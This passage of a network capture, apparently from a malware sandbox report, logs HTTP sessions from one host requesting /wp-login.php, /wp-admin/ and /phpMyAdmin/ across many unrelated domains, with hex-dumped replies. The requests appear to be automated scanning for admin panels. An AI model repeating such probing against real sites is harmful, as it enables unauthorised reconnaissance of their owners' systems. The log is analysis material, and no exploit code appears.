0b 94 0b 89 c8 2d 91 4b 5d 50 3e 37 c6 1b 34 58 93 ac 2b be 6b d1 85 c4 f3 12 af d9 12 a6 38 2d c8 26 86 e9 5d 45 25 51 1d 8e 70 b8 89 f6 c8 91 84 33 70 40 87 c1 7a c2 3c d9 21 4a 0b 2c 15 d1 e3 ab d9 a7 f0 bd 17 e3 ac ee 7a ed 27 be c5 ee 14 1e bb d7 33 0f 0b 5f 79 cd 53 e3 1c 84 b3 2c 56 d6 01 b1 96 84 67 6a fb 9a 2c 17 42 66 6a 07 c8 fe ed c1 47 ef 16 4b b4 a0 99 2e d0 18 65 22 ad 4b 40 32 80 b7 9c 32 62 96 1f 97 a7 d9 f6 56 89 29 8f 3d cc ad 9d 81 c8 73 c0 f6 dd 70 1d 36 32 9c 82 df 09 59 43 12 e7 12 de 72 6b a7 e5 77 66 c4 4a a6 20 a3 1b ec 73 21 e6 0c 22 41 94 91 63 8d 72 a2 d3 e2 48 94 95 e0 20 fc cf 82 fd 78 f7 86 f0 f0 e4 e3 8f 3f de de c0 3a 78 d5 98 f9 2a 80 a3 39 11 70 68 6f d3 b2 d2 b0 be 31 4b 67 cd 8f dd 77 6f 86 66 4b 33 b8 98 9d 7e 99 5e 4e bf 9d 4e 2f e3 93 6f 1f 2e 3e c7 bb 70 45 ee 2a 21 2d e1 1b d8 2d cc 22 78 65 5d 66 c5 17 e6 60 ff ed 6e 60 4d 71 10 07 e0 9e 0f 1a 32 31 a9 35 01 cb 65 ba f5 ba 63 e1 ce 66 52 2b 77 eb b5 fd 72 64 92 e8 5a 72 94 63 a6 88 39 f8 0f fe 9b 94 ed 8d 22 27 f1 e9 d0 e8 ad 11 f7 47 91 4b f6 51 22 b2 25 12 fc 4c e0 0c b2 aa 79 37 35 1c dc 0c 72 d8 a9 ed 9d 60 32 ca e8 2d a2 70 bf 90 b8 aa 88 34 81 66 cf 52 86 95 82 64 cb 5c e8 35 64 73 2a 71 9e 93 38 c1 9c 3b 6a b8 2c 86 93 11 f6 e9 1d 05 93 4e 49 c1 93 97 3c 51 d5 61 f7 33 59 02 c2 a1 e3 6c b8 ba 01 e1 34 38 09 00 90 96 73 04 4e f5 45 48 45 0d 02 26 e6 02 88 f3 00 61 06 c9 75 b2 c6 b6 86 d5 50 9a 1c 33 70 8c 2d 11 18 b3 66 14 c7 b7 b1 a9 6c 16 53 af 73 61 ea 9a 6a 8f db 2b ef 1b 73 1b 53 4d ca 2e ca c8 c3 34 32 29 cf c8 5d 9c d6 52 da 84 69 b1 16 50 7b 1d 20 8f 64 ed 6f 93 8a c6 57 49 bd 0c a1 Data Ascii: W[S8~N~:&$m!P0GXE$2{t)0m\|2zqhd(Ec34K-ihz:b1XGo24l~3tL#s6G/-U0]QA=JI7T32NXJ@(rw@TZ9Bk8"@a`_#I8PzMtBGJK`J%4<@8 ue/tIL-K]P>74X+k8-&]E%Qp3p@z<!J,z'3_yS,Vgj,BfjGK.e"K@22bV)=sp62YCrkwfJ s!"AcrH x?:x9pho1KgwofK3~^NN/o.>pE!--"xe]f`n`Mq215ecfR+wrdZrc9"'GKQ"%Ly75r`2-p4fRd\5dsq8;j,NI<Qa3Yl48sNEHE&auP3p-flSsaj+sSM.42)]RiP{ doWI
Nov 30, 2023 11:22:40.834881067 CET	833	IN	Data Raw: ce a9 30 13 26 71 07 55 51 6d 02 70 9f 74 05 01 6e 90 b9 41 ee a6 71 cf 23 88 56 ee f2 0b ff dd 6f a2 d2 6a 7d 90 d1 21 e6 98 2d 35 4d 95 cd ed 1a 6a 03 00 f8 a9 82 8d 05 6e 15 c3 4f 95 42 84 e2 1a a7 29 98 71 f5 21 1c be df df 1b be 7b 0b d5 f8 Data Ascii: 0&qUQmptnAq#Voj}!-5MjnOB)q!{.&sbqm\808&ron#CI9b>;'rzlzpmu&:jrkA#FhzV(D-f\!5*9Zhc<

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.4	59851	145.14.30.248	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:40.660408974 CET	222	OUT	GET /wp-login.php HTTP/1.1 Host: san.ee Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:40.874552011 CET	828	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:22:40 GMT Content-Type: text/html Content-Length: 494 Last-Modified: Tue, 28 Nov 2023 01:18:59 GMT Connection: keep-alive Keep-Alive: timeout=20 ETag: "65654003-1ee" Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 22 20 6e 61 6d 65 3d 22 68 74 74 70 22 20 76 61 6c 75 65 3d 22 35 30 30 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 35 30 30 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 76 61 72 20 70 72 6f 74 6f 63 6f 6c 3d 22 68 74 74 70 73 3a 22 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 70 6f 72 74 3d 35 30 30 31 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 55 52 4c 3d 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 22 3a 22 2b 70 6f 72 74 2b 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 0a 20 20 20 20 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 55 52 4c 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html> <body> <input type="hidden" id="http" name="http" value="5000"> <input type="hidden" id="https" name="https" value="5001"> <input type="hidden" id="prefer_https" name="prefer_https" value="true"> </body> <script type="text/javascript"> var protocol="https:"; var port=5001; var URL=protocol+"//"+location.hostname+":"+port+location.pathname+location.search; location.replace(URL); </script></html>
Nov 30, 2023 11:22:40.957882881 CET	256	OUT	GET /wp-admin/ HTTP/1.1 Host: san.ee Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://san.ee/wp-login.php
Nov 30, 2023 11:22:41.170758009 CET	828	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:22:41 GMT Content-Type: text/html Content-Length: 494 Last-Modified: Tue, 28 Nov 2023 01:18:59 GMT Connection: keep-alive Keep-Alive: timeout=20 ETag: "65654003-1ee" Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 22 20 6e 61 6d 65 3d 22 68 74 74 70 22 20 76 61 6c 75 65 3d 22 35 30 30 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 35 30 30 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 76 61 72 20 70 72 6f 74 6f 63 6f 6c 3d 22 68 74 74 70 73 3a 22 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 70 6f 72 74 3d 35 30 30 31 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 55 52 4c 3d 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 22 3a 22 2b 70 6f 72 74 2b 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 0a 20 20 20 20 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 55 52 4c 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html> <body> <input type="hidden" id="http" name="http" value="5000"> <input type="hidden" id="https" name="https" value="5001"> <input type="hidden" id="prefer_https" name="prefer_https" value="true"> </body> <script type="text/javascript"> var protocol="https:"; var port=5001; var URL=protocol+"//"+location.hostname+":"+port+location.pathname+location.search; location.replace(URL); </script></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.4	60767	104.247.82.52	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:40.661313057 CET	220	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: cm.cz Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:40.814560890 CET	1340	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:22:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_ocuHnleHsisy/0GX4zddAMoptRgkZRr/GgNpx+cHbcgZ5uhvOKqNdwxuryUdVas4cdjVM0WYL+R5aTBmJp9sVw== Accept-CH: viewport-width Accept-CH: dpr Accept-CH: device-memory Accept-CH: rtt Accept-CH: downlink Accept-CH: ect Accept-CH: ua Accept-CH: ua-full-version Accept-CH: ua-platform Accept-CH: ua-platform-version Accept-CH: ua-arch Accept-CH: ua-model Accept-CH: ua-mobile Accept-CH-Lifetime: 30 X-Domain: cm.cz X-Subdomain: Content-Encoding: gzip Data Raw: 37 63 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 5b eb 76 da c8 b2 fe 1d 3f 85 42 d6 36 f8 0c 77 e3 1b 8e 9c 83 8d e3 4b 02 4e 1c ec d8 ce ca c9 12 52 03 32 42 62 24 61 c0 d9 79 80 f3 5c fb c5 f6 57 dd 2d a9 05 38 99 cc ce cc af cd 4c 0c ea ae ee aa ae 5b 57 55 b7 5e 3e 6f 5e 1c 75 6e df 1d 6b 83 70 e4 1c ac bd a4 2f cd 32 42 a3 60 58 5d c7 33 87 43 36 d7 33 ad d7 d3 69 f3 fd ed f9 1b ef ee 6c f0 60 b6 1b ef 8f 0f 0f df 37 9a 1f a6 8d e9 87 c6 f9 61 e3 ed ef 93 e6 eb e3 ce cd a5 5b 3e f5 cb 5b bd ab 77 3b c7 e7 9d 9d 9d d9 ad fb 6e 74 d9 1d b7 e6 b5 87 e1 ee 9b 5b fb d4 1d b6 c7 cc 72 ef 2f 1a ed 73 d3 b8 69 de 98 6f de 9f b7 cb ee cd 9b bb f3 b7 3b 1d d3 3e 6f ee 36 bc d3 9b 37 95 ad dd a3 c6 f4 b8 d1 78 af eb 5f 3c 73 72 ea 3a ec 34 b0 83 79 a9 7c 72 53 7b b4 ac 46 cb 1b 87 97 fd e1 dd a5 5f 3a e9 b7 c7 b3 df cc d3 ae d9 bf db 9a 0c 1e 2e de fc de b6 a6 b3 89 3f bf b2 ae 8d a0 66 5a f7 d7 ad f2 c7 db b7 bf 5d 6e 19 9d c3 d1 f9 78 2f b8 9e ea 7a 46 9b 8d 1c 37 d0 33 83 30 1c d7 4b a5 e9 74 5a 9c 6e 16 3d bf 5f aa ec ed ed 95 66 c4 0f 0e 54 77 0c b7 af 67 98 9b d1 e2 5f c4 2f 66 58 07 6b 1a 3e 2f 47 2c 34 c0 c6 70 5c 60 bf 4f ec 07 3d 73 e4 b9 21 73 c3 42 67 3e 66 19 cd 14 4f 7a 26 64 b3 b0 44 f3 ee 6b e6 c0 f0 03 16 ea 93 b0 57 d8 cd 94 d4 89 5c 63 c4 f4 cc 83 cd a6 63 cf 0f 95 e1 53 db 0a 07 ba c5 1e 6c 93 15 f8 43 5e b3 5d 3b b4 0d a7 10 98 86 c3 f4 4a 5e 0b 06 be ed 0e 0b a1 57 e8 d9 a1 ee 7a f1 dc a1 1d 3a ec c0 1c 15 cd c7 97 25 f1 20 a8 0f 4c df 1e 87 5a e0 9b 7a 46 f0 a1 ef Data Ascii: 7c9[v?B6wKNR2Bb$ay\W-8L[WU^>o^unkp/2B`X]3C63il`7a[>[w;nt[r/sio;>o67x_<sr:4y\|rS{F_:.?fZ]nx/zF730KtZn=_fTwg_/fXk>/G,4p\`O=s!sBg>fOz&dDkW\ccSlC^];J^Wz:% LZzF
Nov 30, 2023 11:22:40.814567089 CET	1340	IN	Data Raw: 79 7d 87 15 4d 6f 54 32 ac 80 b9 01 2b 59 de c8 b0 dd a0 64 1a bd e2 7d f0 ca e8 8e f5 4a e6 e0 65 49 0c 3e e0 6c 08 c2 b9 c3 b4 11 b3 6c 43 cf a0 83 81 65 07 6b 45 23 c0 42 bf 04 a1 e1 97 b5 af 6b cf ba 86 39 ec fb de c4 b5 ea da c4 77 72 d9 52 Data Ascii: y}MoT2+Yd}JeI>llCekE#Bk9wrRkWvItR8`#4ASzj&g-u9i c?Zv0vy\sl}[S""+%_Od`cl_I9/fi@~=+3
Nov 30, 2023 11:22:40.814583063 CET	266	IN	Data Raw: 86 84 af 8f 0c 37 f3 a5 8b b4 79 08 a5 7a f6 ec 59 f3 a2 f5 af ff 6f 37 34 fc ff ee f2 a2 79 7c be f6 ec 65 c9 40 36 5d 82 1e ca 24 78 59 23 ab 52 23 89 be 15 0a bb a9 74 2f 82 88 40 2b a3 d1 ea 05 8d 44 a2 32 e0 e5 a0 12 25 c5 f8 c5 25 a6 10 13 Data Ascii: 7yzYo74y\|e@6]$xY#R#t/@+D2%%sD!IR`4)9gjy975GT+.Bfx0?xf4=rls?z7f.o?Hul^Z{
Nov 30, 2023 11:22:40.814603090 CET	1340	IN	Data Raw: 65 61 65 0d 0a 30 5a 7d 73 b3 9c a7 ed 46 af 42 31 e1 72 f9 f7 88 b9 93 ae e1 a3 24 91 47 0e 1f 4e 02 7d ce 02 f4 7a 8e 68 cd 6e 20 34 31 27 41 6e 23 56 ce 34 2a b9 fa 77 82 1e ed 1d c7 0f cd 21 f5 51 d6 98 fc 24 46 4a be ca 2f b8 34 51 ec 08 51 Data Ascii: eae0Z}sFB1r$GN}zhn 41'An#V4w!Q$FJ/4QQ31:>pX9+fXPM\|"ggZ64b{'D1b^g+@&qm&^RuT9U O"FvwB3pWj1HJQ
Nov 30, 2023 11:22:40.814630032 CET	1340	IN	Data Raw: d3 26 1d b9 26 a9 b8 61 5e a3 c0 83 d4 4f 2a 08 d5 79 f8 f6 81 3f 76 4f cb 3d 8f c7 ab 3d 04 11 fa 51 81 3c 82 a7 6f d2 6d 86 73 35 1d f9 bf c9 b5 b1 88 b4 ea d8 c1 a1 18 2a a7 f3 33 2b a1 6f 43 e9 09 0e e7 1d a3 4f bb 54 2e 6b f7 7c 7c 67 37 3e Data Ascii: &&a^Oy?vO==Q<oms53+oCOT.k\|\|g7>?cq~ E>p."Xd`B?Vl(~4-GTh\6MfHEEx$k\.{j"Si\m2 xhUH\|\aHtvZjMP0pYf
Nov 30, 2023 11:22:40.814647913 CET	1252	IN	Data Raw: 12 2d bf 20 1a 33 3e d1 6e 5c 60 8a a6 23 b5 10 c5 55 0a 31 b3 38 37 dd 88 26 e1 bb 9e 10 44 b2 0c 55 7a a2 8f 66 78 2e 01 e2 b1 84 8b 0e cd 7a 48 51 73 84 2e 35 8f 38 a9 cf 9c 1c 77 32 79 ba 52 9f 17 e5 51 09 94 5e 03 6e 5e bb 56 8e 74 02 dd d0 Data Ascii: - 3>n\`#U187&DUzfx.zHQs.58w2yRQ^n^VtrR(d9C2qI`?@/IaGZJrYD9sK$$<[Ji 7!~+E' \|X-5Ad`;G6D$+aZGrI.%Hbg45Z\I"W,d

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.4	60087	145.14.30.248	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:40.675934076 CET	221	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: san.ee Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:40.885190010 CET	828	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:22:40 GMT Content-Type: text/html Content-Length: 494 Last-Modified: Tue, 28 Nov 2023 01:18:59 GMT Connection: keep-alive Keep-Alive: timeout=20 ETag: "65654003-1ee" Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 22 20 6e 61 6d 65 3d 22 68 74 74 70 22 20 76 61 6c 75 65 3d 22 35 30 30 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 35 30 30 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 76 61 72 20 70 72 6f 74 6f 63 6f 6c 3d 22 68 74 74 70 73 3a 22 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 70 6f 72 74 3d 35 30 30 31 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 55 52 4c 3d 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 22 3a 22 2b 70 6f 72 74 2b 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 0a 20 20 20 20 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 55 52 4c 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html> <body> <input type="hidden" id="http" name="http" value="5000"> <input type="hidden" id="https" name="https" value="5001"> <input type="hidden" id="prefer_https" name="prefer_https" value="true"> </body> <script type="text/javascript"> var protocol="https:"; var port=5001; var URL=protocol+"//"+location.hostname+":"+port+location.pathname+location.search; location.replace(URL); </script></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.4	60093	64.190.63.111	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:40.676384926 CET	223	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: apee.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:40.868772984 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:22:40 GMT content-length: 0 server: NginX

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.4	60991	3.64.163.50	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:40.694346905 CET	229	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: gcann.cr.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:40.884480953 CET	347	IN	HTTP/1.1 410 Gone Server: openresty Date: Thu, 30 Nov 2023 10:22:40 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 61 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 67 63 61 6e 6e 2e 63 72 2e 63 6f 2e 75 6b 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>4a <meta http-equiv='refresh' content='0; url=http://gcann.cr.co.uk/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.4	60762	3.64.163.50	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:40.926588058 CET	221	OUT	GET /wp-admin/ HTTP/1.1 Host: gbya.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.4	60768	3.64.163.50	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:40.926610947 CET	227	OUT	GET /wp-admin/ HTTP/1.1 Host: gcann.cr.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.4	60542	104.247.82.52	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:40.926656961 CET	221	OUT	GET /wp-login.php HTTP/1.1 Host: cm.cz Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:41.051403046 CET	348	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Thu, 30 Nov 2023 10:22:40 GMT Content-Type: text/html Content-Length: 146 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Nov 30, 2023 11:22:41.057729006 CET	254	OUT	GET /wp-admin/ HTTP/1.1 Host: cm.cz Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://cm.cz/wp-login.php
Nov 30, 2023 11:22:41.215001106 CET	1340	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:22:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_EZbhp3BKBgpcXhZemaFmtauOGlrSIpsduO+J73ALJa99SccqVnZh9qBUCzDJEDUXts0ytwPYuE5mWvxZut4+jQ== Accept-CH: viewport-width Accept-CH: dpr Accept-CH: device-memory Accept-CH: rtt Accept-CH: downlink Accept-CH: ect Accept-CH: ua Accept-CH: ua-full-version Accept-CH: ua-platform Accept-CH: ua-platform-version Accept-CH: ua-arch Accept-CH: ua-model Accept-CH: ua-mobile Accept-CH-Lifetime: 30 X-Domain: cm.cz X-Subdomain: Content-Encoding: gzip Data Raw: 37 63 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 e5 5b eb 76 da c8 b2 fe 1d 3f 85 c2 ac 6d f0 19 6e 02 df 1d 39 07 07 5f 27 e0 24 c6 49 70 d6 9c 2c 21 35 20 23 24 46 12 06 9c 9d 07 38 cf b5 5f 6c 7f d5 dd 92 5a 80 33 93 d9 33 59 eb ac 43 62 1b 75 57 77 55 d7 ad ab ab 5a 2f 9e 37 af 5f 75 ba 6f 4e b5 61 34 76 8f 37 5e d0 1f cd 36 23 b3 64 da 3d d7 b7 46 23 b6 30 72 ad b3 d9 ac f9 b6 7b f5 8b 7f 77 39 7c b0 da 8d b7 a7 27 27 6f 1b cd 9b 59 63 76 d3 b8 3a 69 bc fe 6d da 3c 3b ed 7c 7c e7 55 2f 82 ea 4e ff f6 cd de e9 55 67 6f 6f de f5 de 8c df f5 26 ad c5 f6 c3 68 ff 97 ae 73 e1 8d da 13 66 7b f7 d7 8d f6 95 65 7e 6c 7e b4 7e 79 7b d5 ae 7a 1f 7f b9 bb 7a bd d7 b1 9c ab e6 7e c3 bf f8 f8 8b be b3 ff aa 31 3b 6d 34 de 1a c6 e7 d3 bb de 70 52 3f f9 e5 64 30 b1 3e 0e ef d8 d8 3c 1b 47 e6 f4 fa dc 0d 6e 2e 27 a1 3d bd fe f9 6a af de 78 7d 65 1e 1c dc 58 d6 6f ef bd bb e1 c1 6f 27 b7 af 1e 9b 57 a7 cd db 8f 51 58 5d 44 b3 37 dd e9 e9 ce f8 c3 c3 fc 6e 1a 6d ff 7c 8f 89 73 da 7c ec 7a a1 91 1b 46 d1 e4 b0 52 99 cd 66 e5 59 bd ec 07 83 8a 7e 70 70 50 99 13 3f 38 d0 a1 6b 7a 03 23 c7 bc 9c 96 7c 23 7e 31 d3 3e de d0 f0 79 31 66 91 09 36 46 93 12 fb 6d ea 3c 18 b9 57 be 17 31 2f 2a 75 16 13 96 d3 2c f1 64 e4 22 36 8f 2a 34 ef 91 66 0d cd 20 64 91 31 8d fa a5 fd 5c 45 9d c8 33 c7 cc c8 3d 38 6c 36 f1 83 48 19 3e 73 ec 68 68 d8 ec c1 b1 58 89 3f 14 35 c7 73 22 c7 74 4b a1 65 ba cc d0 8b 5a 38 0c 1c 6f 54 8a fc 52 df 89 0c cf 4f e6 8e 9c c8 65 c7 d6 b8 6c 3d be a8 88 07 41 7d 68 05 ce 24 d2 c2 c0 32 Data Ascii: 7c9[v?mn9_'$Ip,!5 #$F8_lZ33YCbuWwUZ/7_uoNa4v7^6#d=F#0r{w9\|''oYcv:im<;\|\|U/NUgoo&hsf{e~l~~y{zz~1;m4pR?d0><Gn.'=jx}eXoo'WQX]D7nm\|s\|zFRfY~ppP?8kz#\|#~1>y1f6Fm<W1/u,d"64f 